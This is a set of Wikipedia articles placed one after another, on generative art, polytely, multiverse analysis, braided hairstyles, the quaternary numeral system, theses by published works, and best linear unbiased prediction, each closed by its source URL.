Generative artispost-conceptual artthat has been created (in whole or in part) with the use of anautonomoussystem. Anautonomous systemin this context is generally one that is non-human and can independently determine features of an artwork that would otherwise require decisions made directly by the artist. In some cases the human creator may claim that thegenerative systemrepresents their own artistic idea, and in others that the system takes on the role of the creator.
"Generative art" often refers toalgorithmic art(algorithmicallydeterminedcomputer generated artwork) andsynthetic media(general term for any algorithmically generated media), but artists can also make generative art using systems ofchemistry,biology,mechanicsandrobotics,smart materials, manualrandomization,mathematics,data mapping,symmetry, andtiling.
Generative algorithms, algorithms programmed to produce artistic works through predefined rules, stochastic methods, or procedural logic, often yielding dynamic, unique, and contextually adaptable outputs—are central to many of these practices.
The use of the word "generative" in the discussion of art has developed over time. The use of "Artificial DNA" defines a generative approach to art focused on the construction of a system able to generate unpredictable events, all with a recognizable common character. The use ofautonomous systems, required by some contemporary definitions, focuses a generative approach where the controls are strongly reduced. This approach is also named "emergent".Margaret Bodenand Ernest Edmonds have noted the use of the term "generative art" in the broad context of automatedcomputer graphicsin the 1960s, beginning with artwork exhibited byGeorg NeesandFrieder Nakein 1965:[1]A. Michael Noll did his initial computer art, combining randomness with order, in 1962,[2]and exhibited it along with works by Bell Julesz in 1965.[3]
The terms "generative art" and "computer art" have been used in tandem, and more or less interchangeably, since the very earliest days.[1]
The first such exhibition showed the work of Nees in February 1965, which some claim was titled "Generative Computergrafik".[1]While Nees does not himself remember, this was the title of his doctoral thesis published a few years later.[4]The correct title of the first exhibition and catalog was "computer-grafik".[5]"Generative art" and related terms was in common use by several other early computer artists around this time, includingManfred Mohr[1]andKen Knowlton.Vera Molnár(born 1924) is a French media artist of Hungarian origin. Molnar is widely considered to be a pioneer of generative art, and is also one of the first women to use computers in her art practice.
The term "Generative Art" with the meaning of dynamic artwork-systems able to generate multiple artwork-events was clearly used the first time for the "Generative Art" conference in Milan in 1998. The term has also been used to describe geometricabstract artwhere simple elements are repeated, transformed, or varied to generate more complex forms. Thus defined, generative art was practiced by the Argentinian artistsEduardo Mac Entyreand Miguel Ángel Vidal in the late 1960s. In 1972 the Romanian-bornPaul Neagucreated the Generative Art Group in Britain. It was populated exclusively by Neagu using aliases such as "Hunsy Belmood" and "Edward Larsocchi". In 1972 Neagu gave a lecture titled 'Generative Art Forms' at theQueen's University, BelfastFestival.[6][7]
In 1970 theSchool of the Art Institute of Chicagocreated a department calledGenerative Systems. As described bySonia Landy Sheridanthe focus was on art practices using the then new technologies for the capture, inter-machine transfer, printing and transmission of images, as well as the exploration of the aspect of time in the transformation of image information. Also noteworthy isJohn Dunn,[8]first a student and then a collaborator of Sheridan.[9]
In 1988 Clauser[10]identified the aspect of systemic autonomy as a critical element in generative art:
It should be evident from the above description of the evolution of generative art that process (or structuring) and change (or transformation) are among its most definitive features, and that these features and the very term 'generative' imply dynamic development and motion.
(the result) is not a creation by the artist but rather the product of the generative process - a self-precipitating structure.
In 1989 Celestino Soddu defined the Generative Design approach to Architecture and Town Design in his bookCitta' Aleatorie.[11]
In 1989 Franke referred to "generative mathematics" as "the study of mathematical operations suitable for generating artistic images."[12]
From the mid-1990sBrian Enopopularized the termsgenerative musicand generative systems, making a connection with earlierexperimental musicbyTerry Riley,Steve ReichandPhilip Glass.[13]
From the end of the 20th century, communities of generative artists, designers, musicians and theoreticians began to meet, forming cross-disciplinary perspectives.
The first meeting about generative Art was in 1998, at the inaugural International Generative Art conference at Politecnico di Milano University, Italy.[14]In Australia, the Iterate conference on generative systems in the electronic arts followed in 1999.[15]On-line discussion has centered around the eu-gene mailing list,[16]which began late 1999, and has hosted much of the debate which has defined the field.[17]: 1These activities have more recently been joined by theGenerator.xconference in Berlin starting in 2005.
In 2012 the new journal GASATHJ, Generative Art Science and Technology Hard Journal was founded by Celestino Soddu and Enrica Colabella[18]jointing several generative artists and scientists in the editorial board.
Some have argued that as a result of this engagement across disciplinary boundaries, the community has converged on a shared meaning of the term. As Boden and Edmonds[1]put it in 2011:
Today, the term "Generative Art" is still current within the relevant artistic community. Since 1998 a series of conferences have been held in Milan with that title (Generativeart.com), and Brian Eno has been influential in promoting and using generative art methods (Eno, 1996). Both in music and in visual art, the use of the term has now converged on work that has been produced by the activation of a set of rules and where the artist lets a computer system take over at least some of the decision-making (although, of course, the artist determines the rules).
In the call of the Generative Art conferences in Milan (annually starting from 1998), the definition of Generative Art by Celestino Soddu:
Generative Art is the idea realized as genetic code of artificial events, as construction of dynamic complex systems able to generate endless variations. Each Generative Project is a concept-software that works producing unique and non-repeatable events, like music or 3D Objects, as possible and manifold expressions of the generating idea strongly recognizable as a vision belonging to an artist / designer / musician / architect /mathematician.[19]
Discussion on the eu-gene mailing list was framed by the following definition byAdrian Wardfrom 1999:
Generative art is a term given to work which stems from concentrating on the processes involved in producing an artwork, usually (although not strictly) automated by the use of a machine or computer, or by using mathematic or pragmatic instructions to define the rules by which such artworks are executed.[20]
A similar definition is provided by Philip Galanter:[17]
Generative art refers to any art practice where the artist creates a process, such as a set of natural language rules, a computer program, a machine, or other procedural invention, which is then set into motion with some degree of autonomy contributing to or resulting in a completed work of art.
Around the 2020s, generative AI models learned to imitate the distinct style of particular authors. For example, a generative image model such asStable Diffusionis able to model the stylistic characteristics of an artist likePablo Picasso(including his particular brush strokes, use of colour, perspective, and so on), and a user can engineer a prompt such as "an astronaut riding a horse, by Picasso" to cause the model to generate a novel image applying the artist's style to an arbitrary subject. Generative image models have received significant backlash from artists who object to their style being imitated without their permission, arguing that this harms their ability to profit from their own work.[21]
Johann Kirnberger'sMusikalisches Würfelspiel("Musical Dice Game") of 1757 is considered an early example of a generative system based on randomness. Dice were used to select musical sequences from a numbered pool of previously composed phrases. This system provided a balance of order and disorder. The structure was based on an element of order on one hand, and disorder on the other.[22]
ThefuguesofJ.S. Bachcould be considered generative, in that there is a strict underlying process that is followed by the composer.[23]Similarly,serialismfollows strict procedures which, in some cases, can be set up to generate entire compositions with limited human intervention.[24][25]
Composers such asJohn Cage,[26]: 13–15Farmers Manual,[27]andBrian Eno[26]: 133have usedgenerative systemsin their works.
The artistEllsworth Kellycreated paintings by using chance operations to assign colors in a grid. He also created works on paper that he then cut into strips or squares and reassembled using chance operations to determine placement.[28]
Artists such asHans Haackehave explored processes of physical and social systems in artistic context.François Morellethas used both highly ordered and highly disordered systems in his artwork. Some of his paintings feature regular systems of radial or parallel lines to createMoiré Patterns. In other works he has used chance operations to determine the coloration of grids.[29][30]Sol LeWittcreated generative art in the form of systems expressed innatural languageand systems of geometricpermutation.Harold Cohen'sAARONsystem is a longstanding project combining software artificial intelligence with robotic painting devices to create physical artifacts.[31]Steina and Woody Vasulkaare video art pioneers who used analog video feedback to create generative art. Video feedback is now cited as an example of deterministic chaos, and the early explorations by the Vasulkas anticipated contemporary science by many years.
Software systems exploitingevolutionary computingto create visual form include those created byScott DravesandKarl Sims.
The digital artistJoseph Nechvatalhas exploited models of viral contagion.[32]AutopoiesisbyKen Rinaldoincludes fifteen musical androboticsculptures that interact with the public and modify their behaviors based on both the presence of the participants and each other.[26]: 144–145Jean-Pierre HebertandRoman Verostkoare founding members of theAlgorists, a group of artists who create their own algorithms to create art.A. Michael Noll, of Bell Telephone Laboratories, Incorporated, programmed computer art using mathematical equations and programmed randomness, starting in 1962.[33]
The French artistJean-Max Albert, beside environmental sculptures likeIapetus,[34]andO=C=O,[35]developed a project dedicated to the vegetation itself, in terms of biological activity. TheCalmoduline Monumentproject is based on the property of a protein,calmodulin, to bond selectively to calcium. Exterior physical constraints (wind, rain, etc.) modify the electric potential of the cellular membranes of a plant and consequently the flux of calcium. However, the calcium controls the expression of the calmoduline gene.[36]The plant can thus, when there is a stimulus, modify its "typical" growth pattern. So the basic principle of this monumental sculpture is that to the extent that they could be picked up and transported, these signals could be enlarged, translated into colors and shapes, and show the plant's "decisions" suggesting a level of fundamental biological activity.[37]
Maurizio Bologniniworks with generative machines to address conceptual and social concerns.[38]Mark Napieris a pioneer in data mapping, creating works based on the streams of zeros and ones in Ethernet traffic, as part of the "Carnivore" project.Martin Wattenbergpushed this theme further, transforming "data sets" as diverse as musical scores (in "Shape of Song", 2001) and Wikipedia edits (History Flow, 2003, withFernanda Viegas) into dramatic visual compositions.
The Canadian artistSan Basedeveloped a "Dynamic Painting" algorithm in 2002. Using computer algorithms as "brush strokes", Base creates sophisticated imagery that evolves over time to produce a fluid, never-repeating artwork.[39]
Since 1996 there have beenambigram generatorsthat auto generateambigrams.[40][41][42]
Italian composerPietro Grossi, pioneer ofcomputer musicsince 1986, he extended his experiments to images, (same procedure used in his musical work) precisely to computer graphics, writing programs with specific auto-decisions, and developing the concept ofHomeArt, presented for the first time in the exhibitionNew Atlantis: the continent of electronic musicorganized by theVenice Biennalein 1986.
Some contemporary artists who create generative visual artworks areJohn Maeda,Daniel Shiffman,Zachary Lieberman,Golan Levin,Casey Reas,Ben Fry, andGiles Whitaker (artist).
For some artists, graphic user interfaces and computer code have become an independent art form in themselves.Adrian Wardcreated Auto-Illustrator as a commentary on software and generative methods applied to art and design.[citation needed]
In 1987Celestino Sodducreated the artificial DNA of Italian Medieval towns able to generate endless3Dmodels of cities identifiable as belonging to the idea.[43]
In 2010,Michael Hansmeyergenerated architectural columns in a project called "Subdivided Columns – A New Order (2010)". The piece explored how the simple process of repeated subdivision can create elaborate architectural patterns. Rather than designing any columns directly, Hansmeyer designed a process that produced columns automatically. The process could be run again and again with different parameters to create endless permutations. Endless permutations could be considered a hallmark of generative design.[44]
Writers such asTristan Tzara,Brion Gysin, andWilliam Burroughsused thecut-up techniqueto introduce randomization to literature as a generative system.Jackson Mac Lowproduced computer-assisted poetry and used algorithms to generate texts;Philip M. Parkerhas written software to automatically generate entire books.Jason Nelsonused generative methods with speech-to-text software to create a series of digital poems from movies, television and other audio sources.[45]
In the late 2010s, authors began to experiment withneural networkstrained on large language datasets.David Jhave Johnston'sReRitesis an early example of human-edited AI-generated poetry.
Generative systems may be modified while they operate, for example by using interactive programming environments such asCsound,SuperCollider,FluxusandTidalCycles, including patching environments such asMax/MSP,Pure Dataandvvvv. This is a standard approach to programming by artists, but may also be used to create live music and/or video by manipulating generative systems on stage, a performance practice that has become known aslive coding. As with many examples ofsoftware art, because live coding emphasizes human authorship rather than autonomy, it may be considered in opposition to generative art.[46]
In 2020, Erick "Snowfro" Calderon launched the Art Blocks platform[47]for combining the ideas of generative art and theblockchain, with resulting artworks created asNFTson theEthereumblockchain. One of the key innovations with the generative art created in this way is that all the source code and algorithm for creating the art has to be finalized and put on the blockchain permanently, without any ability to alter it further. Only when the artwork is sold ("minted"), the artwork is generated; the result is random yet should reflect the overall aesthetic defined by the artist. Calderon argues that this process forces the artist to be very thoughtful of the algorithm behind the art:
Until today, a [generative] artist would create an algorithm, press the spacebar 100 times, pick five of the best ones and print them in high quality. Then they would frame them, and put them in a gallery.Maybe.Because Art Blocks forces the artist to accept every single output of the algorithm as their signed piece, the artist has to go back and tweak the algorithm until it's perfect. They can't just cherry pick the good outputs. That elevates the level of algorithmic execution because the artist is creating something that they know they're proud of before they even know what's going to come out on the other side.[48]
In 2003, Philip Galanter published the most widely cited theory of generative art which describes generative art systems in the context of complexity theory.[17]In particular the notion ofMurray Gell-MannandSeth Lloyd'seffective complexityis cited. In this view both highly ordered and highly disordered generative art can be viewed as simple. Highly ordered generative art minimizesentropyand allows maximaldata compression, and highly disordered generative art maximizes entropy and disallows significant data compression. Maximally complex generative art blends order and disorder in a manner similar to biological life, and indeed biologically inspired methods are most frequently used to create complex generative art. This view is at odds with the earlierinformation theoryinfluenced views ofMax Bense[49]andAbraham Moles[50]where complexity in art increases with disorder.
Galanter notes further that given the use of visual symmetry, pattern, and repetition by the most ancient known cultures generative art is as old as art itself. He also addresses the mistaken equivalence by some that rule-based art is synonymous with generative art. For example, some art is based on constraint rules that disallow the use of certain colors or shapes. Such art is not generative because constraint rules are not constructive, i.e. by themselves they do not assert what is to be done, only what cannot be done.[51]
In their 2009 article,Margaret Bodenand Ernest Edmonds agree that generative art need not be restricted to that done using computers, and that some rule-based art is not generative. They develop a technical vocabulary that includes Ele-art (electronic art), C-art (computer art), D-art (digital art), CA-art (computer assisted art), G-art (generative art), CG-art (computer based generative art), Evo-art (evolutionary based art), R-art (robotic art), I-art (interactive art), CI-art (computer based interactive art), and VR-art (virtual reality art).[1]
The discourse around generative art can be characterized by the theoretical questions which motivate its development. McCormack et al. propose the following questions, shown with paraphrased summaries, as the most important:[52]
Another question is of postmodernism—are generative art systems the ultimate expression of the postmodern condition, or do they point to a new synthesis based on a complexity-inspired world-view?[53]
|
https://en.wikipedia.org/wiki/Generative_art
|
Polytely(fromGreekrootspoly-and-tel-meaning "many goals") comprises complexproblem-solvingsituations characterized by the presence of multiple simultaneous goals.[1]These goals may be contradictory or otherwise conflict with one another, requiring prioritisation of desired outcomes.[1]
Polytely is a feature of complex problem-solving that adds difficulty to finding an optimum solution. Funke describes polytely as a feature "not... inherent in a system, but [referring] to certain decisions of the experimenter", especially decisions relating to what goals are to be followed in solving the problem.[2]In the complex problem of nuclear waste disposal, Flüeler cites both trust betweenstates(as a factor innuclear proliferation: "Some states disarm whilst others re-arm – both do it for the sake of our planet's peace"), and safe andsustainabledisposal of nuclear waste as situations where considering in terms of polytely helps elaborate and then balance important but conflicting goals.[3]
|
https://en.wikipedia.org/wiki/Polytely
|
Multiverse analysisis a scientific method that specifies and then runs a set of plausible alternative models or statistical tests for a single hypothesis.[1]It is a method to address the issue that the "scientific process confronts researchers with a multiplicity of seemingly minor, yet nontrivial, decision points, each of which may introduce variability in research outcomes".[2]A problem also known asResearcher degrees of freedom[3]or as thegarden of forking paths. It is a method arising in response to the credibility andreplication crisistaking place in science, because it can diagnose the fragility or robustness of a study's findings. Multiverse analyses have been used in the fields of psychology[4]and neuroscience.[5]It is also a form ofmeta-analysisallowing researchers to provide evidence on how different model specifications impact results for the same hypothesis, and thus can point scientists toward where they might need better theory orcausal models.
Multiverse analysis most often produces a large number of results that tend to go in all directions. This means that most studies do not offer consensus or specific rejection of an hypothesis. Its strongest utilities thus far are instead to provide evidence against conclusions based on findings from single studies or to provide evidence about which model specifications are more or less likely to cause larger or more robust effect sizes (or not).
Evidence against single studies or statistical models, is useful in identifying potentialfalse positiveresults. For example, a now infamous study concluded that female gender named hurricanes are more deadly than male gender named hurricanes.[6]In a follow up study,[7]researchers ran thousands of models using the same hurricane data, but making various plausible adjustments to the regression model. By plotting a density curve of all regression coefficients, they showed that the coefficient of the original study was an extreme outlier.
In a study of birth order effects,[8]researchers visualized a multiverse of plausible models using aspecification curvewhich allows researchers to visually inspect a plot of all model outcomes against various model specifications. They could show that their findings supported previous research of birth order on intellect, but provided evidence against an effect on life satisfaction and various personality traits.
|
https://en.wikipedia.org/wiki/Multiverse_analysis
|
Braids(also referred to asplaits) are a complex hairstyle formed by interlacing three or more strands of hair.[1]Braiding has never been specific to any one part of the world, ethnic type, hair type or culture, but has been used to style and ornament human and animal hair for thousands of years world-wide[2]in various cultures around the world.
The simplest and most common version is a flat, solid, three-stranded structure. More complex patterns can be constructed from an arbitrary number of strands to create a wider range of structures (such as a fishtail braid, a five-stranded braid, rope braid, a French braid and a waterfall braid). The structure is usually long and narrow with each component strand functionally equivalent in zigzagging forward through the overlapping mass of the others. Structurally, hair braiding can be compared with the process ofweaving, which usually involves two separate perpendicular groups of strands (warpandweft).
The oldest known reproduction of hair braiding may go back about 30,000 years inEurope: theVenus of WillendorfinAustria, now known inacademiaas the Woman ofWillendorf, is a femalefigurineestimated to have been made between about 28,000 and 25,000BCE.[3]It has been disputed whether or not she wears braided hair or some sort of a woven basket on her head.
TheVenus of BrassempouyinFranceis estimated to be about 25,000 years old and ostensibly shows a braided hairstyle.[4]
Another sample of a different origin was traced back to a burial site calledSaqqaralocated on theNile River, during the first dynasty ofPharaohMenes, although the Venus' of Brassempouy and Willendorf predate these examples by some 25,000-30,000 years.
During theBronze Age,Iron Ageand Greco-Roman era (a period spanning 3500 BC to 500 AD) many peoples inWest Asia,Asia Minor,Caucasus,Southeast Europe,East Mediterranean,BalkansandNorth Africabraided hair, beards and moustaches. InMesopotamia, the practice was common among theSumerians,Akkadians,Assyrians,BabyloniansandChaldeans, surviving among some Assyrians into the 18th century AD. InAncient IrantheElamites,Gutians,Lullubi,Kassites,Manneans,Persians,MedesandParthiansare depicted with braided hair and beards. ThroughoutAnatolia(Asia Minor),Hittites,Hattians,Hurrians,Mitanni,Luwians,Mycenean Greeks,UrartiansandLydiansare also depicted with these styles. In theLevant, braiding also appears among theAmorites,Eblaites,Arameans,Israelites,Phoenicians,Judeans,MoabitesUgaritesandEdomitesamong others.Arabian Peninsulaart depictsDilmunites,Arabs,Maganites,UbaritesandShebansin similar fashion. InNorth Africathe practice was common amongEgyptians,Hyksos,LibyansandBerbersand further south amongNubiansandAxumites, as well as amongColchians,ArmeniansandScythiansof theCaucasusandMinoans,Etruscans,Greeks,DaciansandPelasgiansinEurope.[5][6]There has also been foundbog bodiesinNorthern Europewearing braided hairstyles from theNorthern European Iron Age, and later still such braided styles were found among theCelts,Iberians,Germanic peoples,SlavsandVikingsin northern, western, Eastern and southwestern Europe.[7][8]
In some regions, a braid was a means of communication. At a glance, one individual could distinguish a wealth of information about another, whether they were married, mourning, or of age for courtship, simply by observing their hairstyle. Braids were a means ofsocial stratification. Certain hairstyles were distinctive to particular tribes or nations. Other styles informed others of an individual's status in society.African peoplesuch as theHimba peopleofNamibia,Maasai peopleofKenyahave been braiding their hair for centuries. In many African tribes, hairstyles are unique and used to identify each tribe. Braid patterns or hairstyles can indicate a person's community, age, marital status, wealth, power, social position, and religion.[9]
On July 3, 2019, California became the first US state to prohibit discrimination over natural hair. GovernorGavin Newsomsigned theCROWN Actinto law, banning employers and schools from discriminating against hairstyles such as dreadlocks, braids,afros, and twists.[10]Later in 2019, Assembly Bill 07797 became law in New York state; it "prohibits race discrimination based on natural hair or hairstyles."[11]
Braiding is traditionally a social art. Because of the time it takes to braid hair, people have often taken time to socialize while braiding and having their hair braided. It begins with the elders making simple knots and braids for younger children. Older children watch and learn from them, start practicing on younger children, and eventually learn the traditional designs. This carries on a tradition of bonding between elders and the new generation.
There are a number of different types of braided hairstyles, including, commonly,French braids,corn rows, andbox braiding.[12]Braided hairstyles may also be used in combination with or as an alternative to simpler bindings, such asponytailsorpigtails. Braiding may also be used to add ornamentation, such as beads orhair extensions, as incrochet braiding.
European braids have been a cultural phenomenon for thousands of years. The Romans held braids to express status in both the Republic and Empire.
Germanic cultures have also been known to have braids for centuries. The Psalter of Stuttgart in 820AD shows women with braided hair.
InIndia, braiding is common in both rural and urban areas. Girls are seen in twin braids especially in schools, though now it is becoming less common. Young girls usually have one long braid. Married women have abunor a braided bun.[citation needed]
Braids have been part of black culture going back generations. There are pictures going as far back as the year 1884 showing a Senegalese woman with braided hair in a similar fashion to how they are worn today.[13]
Braids are normally done tighter in black culture than in others, such as incornrowsorbox braids. While this leads to the style staying in place for longer, it can also lead to initial discomfort. This is commonly accepted and managed through pain easing techniques. Some include pain killers, letting the braids hang low, and using leave-in-conditioner.[14]Alternative braiding techniques like knotless braids, which incorporate more of a person's natural hair and place less tension on the scalp, can cause less discomfort.[15]
Braids are not usually worn year-round in black culture; they are instead alternated with other popular hairstyles such ashair twists,protective hairstylesand more. Curly Mohawk, Half Updo and Side-Swept Cornrows braids are some of the popular and preferred styles in black culture.[16]As long as braids are done with a person's own hair, it can be considered as part of thenatural hair movement.
InIndia, manyHindu asceticswear dreadlocks, known asJatas.[17]Young girls and women in India often wear long braided hair at the back of their neck.[18]In theUpanishads, braided hair is mentioned as one of the primary charms of female seduction.[19]A significant tradition of braiding existed inMongolia, where it was traditionally believed that the human soul resided in the hair. Hair was only unbraided when death was imminent.[20][21]InJapan, theSamuraisported a high-bound ponytail (Chonmage), a hairstyle that is still common amongSumowrestlers today. Japanese women wore various types of braids (三つ編みmitsuami) until the late 20th century because school regulations prohibited other hairstyles, leaving braids and thebob hairstyleas the main options for girls.[22]In China, girls traditionally had straight-cutbangsand also wore braids (辮子biànzi). TheManchumen have historically braided their hair. After conquering Beijing in 1644 and establishing theQing Dynasty, they forced the men of the subjugatedHan Chineseto adopt this hairstyle as an expression of loyalty, which involved shaving the forehead and sides and leaving a longqueueat the back (剃髮易服tìfà yìfú). The Han Chinese considered this a humiliation as they had never traditionally cut their hair due toConfucian customs. The last emperor,Puyi, cut off his queue in 1912, marking the end of this male hairstyle in China, the same year when China became a republic.[23][24]
Braided hairstyles were widespread among many North American indigenous peoples, with traditions varying greatly from tribe to tribe. For example, among theQuapaw, young girls adorned themselves with spiral braids, while married women wore their hair loose.[25]Among theLenape, women wore their hair very long and often braided it.[26][27]Among theBlackfoot, men wore braids, often on both sides behind the ear.[28]The men of theKiowatribe often wrapped pieces of fur around their braids, called a hair drop. Among theLakota, both men and women wore their hair in 2 braids with men’s being typically longer than women’s. Some had their hair wrapped in furs, typically bison, called ahair drop, some native groups of the Great Plains also had this hairstyle. During times of war, warriors would often have their hair unbraided as a sign of fearlessness. Among theMaya, women had intricate hairstyles with two braids, while men had a single large braid that encircled the head.[29]
InJamaica, theRastafarimovement emerged in the 1930s, a Christian faith practiced by descendants of African slaves who often wear dreadlocks and untrimmed beards, in adherence to the Old Testament prohibition on cutting hair.
Somefetishistsfind braids to be a strong erotic stimulus. Most commonly, the tightly wovenFrench braidis mentioned in this context.
In the olderpsychiatricliterature, there are occasional references to fetishists who, in order to possess the desired object, would cut off female braids. For example, Swiss psychiatristAuguste Foreldescribed the case of a braid-cutter in Berlin in 1906, who was found in possession of 31 braids.[30]Richard von Krafft-Ebinghad already explored a deeper understanding of hair fetishism in the late 19th century.[31]
In psychoanalytic literary interpretation, authors have continued to explore braid-cutters to this day. Notably, an episode inErnest Hemingway's novelFor Whom the Bell Tollshas aroused considerable interest.[32][33]Sigmund Freudhad interpreted hair-cutting as a symboliccastrationinTotem and Taboo(1913).[34]Some authors later followed him in seeing the braid as aphallic symbol.[35][36][37]Others interpreted braids as a symbol ofvirginityand the unbraiding or cutting of the braid as a symbol of defloration.[38]
Braiding is also used to prepare horses' manes and tails forshowingsuch as inpoloandpolocrosse.[39]
|
https://en.wikipedia.org/wiki/Braid_(hairstyle)
|
Quaternary/kwəˈtɜːrnəri/is anumeral systemwithfouras itsbase. It uses thedigits0, 1, 2, and 3 to represent anyreal number. Conversion frombinaryis straightforward.
Four is the largest number within thesubitizingrange and one of two numbers that is both a square and ahighly composite number(the other being thirty-six), making quaternary a convenient choice for a base at this scale. Despite being twice as large, itsradix economyis equal to that of binary. However, it fares no better in the localization of prime numbers (the smallest better base being theprimorialbase six,senary).
Quaternary shares with all fixed-radixnumeral systems many properties, such as the ability to represent any real number with a canonical representation (almost unique) and the characteristics of the representations ofrational numbersandirrational numbers. Seedecimalandbinaryfor a discussion of these properties.
As with theoctalandhexadecimalnumeral systems, quaternary has a special relation to thebinary numeral system. Eachradixfour, eight, and sixteen is apower of two, so the conversion to and from binary is implemented by matching each digit with two, three, or four binary digits, orbits. For example, in quaternary,
Since sixteen is a power of four, conversion between these bases can be implemented by matching each hexadecimal digit with two quaternary digits. In the above example,
Although octal and hexadecimal are widely used incomputingandcomputer programmingin the discussion and analysis of binary arithmetic and logic, quaternary does not enjoy the same status.
Although quaternary has limited practical use, it can be helpful if it is ever necessary to perform hexadecimal arithmetic without a calculator. Each hexadecimal digit can be turned into a pair of quaternary digits. Then, arithmetic can be performed relatively easily before converting the end result back to hexadecimal. Quaternary is convenient for this purpose, since numbers have only half the digit length compared to binary, while still having very simple multiplication and addition tables with only three unique non-trivial elements.
By analogy withbyteandnybble, a quaternary digit is sometimes called acrumb.
Due to having only factors of two, many quaternary fractions have repeating digits, although these tend to be fairly simple:
Many or all of theChumashan languages(spoken by the Native AmericanChumash peoples) originally used a quaternary numeral system, in which the names for numbers were structured according to multiples of four and sixteen, instead of ten. There is a surviving list ofVentureño languagenumber words up to thirty-two written down by a Spanish priest ca. 1819.[1]
TheKharosthi numerals(from the languages of the tribes of Pakistan and Afghanistan) have a partial quaternary numeral system from one to ten.
Quaternary numbers are used in the representation of 2DHilbert curves. Here, a real number between 0 and 1 is converted into the quaternary system. Every single digit now indicates in which of the respective four sub-quadrants the number will be projected.
Parallels can be drawn between quaternary numerals and the waygenetic codeis represented byDNA. The four DNAnucleotidesinalphabetical order, abbreviatedA,C,G, andT, can be taken to represent the quaternary digits innumerical order0, 1, 2, and 3. With this encoding, thecomplementarydigit pairs 0↔3, and 1↔2 (binary 00↔11 and 01↔10) match the complementation of thebase pairs: A↔T and C↔G and can be stored as data in DNA sequence.[2]For example, the nucleotide sequence GATTACA can be represented by the quaternary number 2033010 (=decimal9156 orbinary10 00 11 11 00 01 00). Thehuman genomeis 3.2 billion base pairs in length.[3]
Quaternaryline codeshave been used for transmission, from theinvention of the telegraphto the2B1Qcode used in modernISDNcircuits.
The GDDR6X standard, developed byNvidiaandMicron, uses quaternary bits to transmit data.[4]
Some computers have usedquaternary floating pointarithmetic including theIllinois ILLIAC II(1962)[5]and the Digital Field System DFS IV and DFS V high-resolution site survey systems.[6]
|
https://en.wikipedia.org/wiki/Base4
|
Athesis as a collection of articles[1]orseries of papers,[2]also known asthesis by published works,[1]orarticle thesis,[3]is adoctoraldissertationthat, as opposed to a coherentmonograph, is a collection of research papers with an introductory section consisting of summary chapters. Other less used terms are "sandwich thesis" and "stapler thesis". It is composed of already-published journal articles, conference papers and book chapters; and, occasionally, not-yet-published manuscripts. Athesisby publication is a form ofcompilation thesis(a term used in Nordic countries). Another form of compilation thesis is theessay thesis, which is composed of previously unpublished independentessays.[3]
Today, article theses are the standard format in natural, medical, and engineering sciences (e.g., in theNordic countries), while in social and cultural sciences, there is a strong but decreasing tradition to produce coherent monographs, i.e., thesis as a series of linked chapters. At other times, doctoral students may have a choice between writing a monograph or a compilation thesis.[4][5]
The thesis by published works format is chosen in cases where the student intends to first publish the thesis in parts in international journals. It often results in a higher number of publications during doctoral studies than a monograph, and may render in a higher number of citations in other research publications – something that may be advantageous from research funding point of view and may facilitate readership appointment after the dissertation.[clarification needed]A further reason for writing a compilation thesis is that some of the articles can be written together with other authors, which may be especially helpful for new doctoral students. A majority of the articles should be reviewed by referees outside of the student's own department, supplementing the audit carried out by the supervisory staff and dissertation opponent, thus assuring international standards.[4]
The introductory or summary chapters of a thesis by published works should be written independently by the student. They should include an extensive annotatedbibliographyorliterature review, placing the scope and results of the articles in the wider context of the current state of international research. They constitute a comprehensive summary of the appended papers, and should clarify the contribution of the doctoral student if the papers are written by several authors. They should not provide new results, but may provide synthesis of new conclusions by combining results from several of the papers. They may supplement the articles with a motivation of the chosen scope, research problems, objectives and methods, and a strengthening of the theoretical framework, analysis and conclusions, since the extent of the articles normally does not allow these kind of longer discussions.[3][6][7]
|
https://en.wikipedia.org/wiki/Collection_of_articles
|
Instatistics,best linear unbiased prediction(BLUP) is used in linearmixed modelsfor the estimation ofrandom effects. BLUP was derived byCharles Roy Hendersonin 1950 but the term "best linear unbiased predictor" (or "prediction") seems not to have been used until 1962.[1]"Best linear unbiased predictions" (BLUPs) of random effects are similar to best linear unbiased estimates (BLUEs) (seeGauss–Markov theorem) of fixed effects. The distinction arises because it is conventional to talk aboutestimatingfixed effects but aboutpredictingrandom effects, but the two terms are otherwise equivalent. (This is a bit strange since the random effects have already been "realized"; they already exist. The use of the term "prediction" may be because in the field of animal breeding in which Henderson worked, the random effects were usually genetic merit, which could be used to predict the quality of offspring (Robinson[1]page 28)). However, the equations for the "fixed" effects and for the random effects are different.
In practice, it is often the case that the parameters associated with the random effect(s) term(s) are unknown; these parameters are the variances of the random effects and residuals. Typically the parameters are estimated and plugged into the predictor, leading to theempirical best linear unbiased predictor(EBLUP). Notice that by simply plugging in the estimated parameter into the predictor, additional variability is unaccounted for, leading to overly optimistic prediction variances for the EBLUP.[citation needed]
Best linear unbiased predictions are similar toempirical Bayesestimates of random effects in linear mixed models, except that in the latter case, where weights depend on unknown values of components of variance, these unknown variances are replaced by sample-based estimates.
Suppose that the model for observations {Yj;j= 1, ...,n} is written as
whereμ{\displaystyle \mu }is the mean of all observationsY{\displaystyle Y}, andξjandεjrepresent the random effect and observation error for observationj, and suppose they are uncorrelated and have known variancesσξ2andσε2, respectively. Further,xjis a vector ofindependent variablesfor thejth observation andβ{\displaystyle \beta }is a vector of regression parameters.
The BLUP problem of providing an estimate of the observation-error-free value for thekth observation,
can be formulated as requiring that the coefficients of a linear predictor, defined as
should be chosen so as to minimise the variance of the prediction error,
subject to the condition that the predictor is unbiased,
In contrast to the case ofbest linear unbiased estimation, the "quantity to be estimated",Y~k{\displaystyle {\widetilde {Y}}_{k}}, not only has a contribution from a random element but one of the observed quantities, specificallyYk{\displaystyle Y_{k}}which contributes toY^k{\displaystyle {\widehat {Y}}_{k}}, also has a contribution from this same random element.
In contrast to BLUE, BLUP takes into account known or estimated variances.[2]
Henderson explored breeding from a statistical point of view. His work assisted the development of theselection index(SI) andestimated breeding value(EBV). These statistical methods influenced the artificial insemination stud rankings used in the United States. These early statistical methods are confused with the BLUP now common in livestock breeding.
The actual term BLUP originated out of work at theUniversity of Guelphin Canada by Daniel Sorensen and Brian Kennedy, in which they extended Henderson's results to a model that includes several cycles of selection.[3]This model was popularized by the University of Guelph in the dairy industry under the name BLUP. Further work by the University showed BLUP's superiority over EBV and SI leading to it becoming the primary genetic predictor[citation needed].
There is thus confusion between the BLUP model popularized above with the best linear unbiased prediction statistical method which was too theoretical for general use. The model was supplied for use on computers to farmers.
In Canada, all dairies report nationally. The genetics in Canada were shared making it the largest genetic pool and thus source of improvements. This and BLUP drove a rapid increase inHolstein cattlequality.
|
https://en.wikipedia.org/wiki/Best_linear_unbiased_prediction
|
